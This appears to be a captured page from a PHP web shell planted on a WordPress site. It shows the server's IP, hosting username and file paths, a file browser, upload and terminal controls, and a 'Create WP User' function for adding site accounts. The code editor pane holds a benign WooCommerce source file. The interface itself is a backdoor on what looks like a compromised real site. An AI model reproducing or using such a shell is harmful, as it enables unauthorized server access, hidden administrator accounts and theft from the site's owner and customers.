Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
src
/
Internal
/
ProductFeed
/
Integrations
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
POSCatalog
[目录]
drwxr-xr-x
2026-03-03 00:17
IntegrationInterface.php
2.06 KB
-rw-r--r--
2026-03-03 00:17
IntegrationRegistry.php
1.30 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
IntegrationRegistry.php
<?php /** * Integration Registry class. * * Stores all provider integrations that are available. * * @package Automattic\WooCommerce\Internal\ProductFeed */ declare(strict_types=1); namespace Automattic\WooCommerce\Internal\ProductFeed\Integrations; if ( ! defined( 'ABSPATH' ) ) { exit; } /** * IntegrationRegistry * * @since 10.5.0 */ class IntegrationRegistry { /** * List of all available Integrations. * * @var array<string,IntegrationInterface> */ private array $integrations = array(); /** * Register an Integration. * * @since 10.5.0 * * @param IntegrationInterface $integration The integration to register. */ public function register_integration( IntegrationInterface $integration ): void { $this->integrations[ $integration->get_id() ] = $integration; } /** * Get an Integration by ID. * * @since 10.5.0 * * @param string $id The ID of the Integration. * @return IntegrationInterface|null The Integration, or null if it is not registered. */ public function get_integration( string $id ): ?IntegrationInterface { return $this->integrations[ $id ] ?? null; } /** * Get all registered integrations. * * @since 10.5.0 * * @return array<string,IntegrationInterface> */ public function get_integrations(): array { return $this->integrations; } }
关闭
保存